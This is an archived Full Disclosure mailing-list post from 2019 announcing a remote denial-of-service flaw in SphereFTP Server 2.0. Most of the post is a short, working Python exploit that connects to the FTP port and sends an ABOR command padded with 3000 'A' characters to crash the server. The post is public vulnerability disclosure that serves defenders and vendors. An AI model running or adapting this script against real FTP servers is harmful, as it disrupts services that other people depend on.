[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] SphereFTP 2.0 Denial Of Service

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] SphereFTP 2.0 Denial Of Service
From: Sachin Wagh <wsachin092@xxxxxxxxx>
Date: Thu, 4 Apr 2019 10:03:54 +0530

#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit

import socket
import sys

evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))

s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] DSA-2019-031: Dell EMC IsilonSD Management Server Cross-Site Scripting (XSS) Vulnerabilities
Next by Date: [FD] hardwear.io 2019 Call For Papers is Open - USA & Netherlands
Previous by thread: [FD] DSA-2019-031: Dell EMC IsilonSD Management Server Cross-Site Scripting (XSS) Vulnerabilities
Next by thread: [FD] hardwear.io 2019 Call For Papers is Open - USA & Netherlands
Index(es):
- Date
- Thread